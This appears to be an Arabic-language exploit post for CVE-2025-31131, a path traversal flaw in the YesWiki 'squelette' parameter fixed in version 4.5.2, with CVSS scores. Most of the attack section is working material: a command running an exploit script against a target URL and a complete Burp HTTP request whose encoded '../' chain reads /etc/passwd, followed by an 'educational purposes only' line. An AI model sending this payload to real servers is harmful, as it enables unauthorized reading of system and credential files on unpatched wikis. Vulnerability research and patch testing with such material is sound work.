
CVE-2025-31131
CVE-2025-31131 - YesWiki < 4.5.2 ثغرة اجتياز المسار (Path Traversal Exploit)
YesWiki هو نظام ويكي مكتوب بلغة PHP. معامل squelette معرّض لهجمات اجتياز المسار، مما يتيح قراءة ملفات عشوائية على الخادم. تم إصلاح هذه الثغرة في الإصدار 4.5.2.
NIST: NVD النتيجة الأساسية: 7.5 🔴 عالية المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CNA: GitHub, Inc النتيجة الأساسية: 8.6 🔴 عالية المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
┌──(kali㉿kali)-[~]
└─$ sudo python3 exploit.py -u https://example.com/
إليك طريقة ثانية للاستغلال يدويًا باستخدام Burp:
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: target.com
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
هذا للأغراض التعليمية فقط.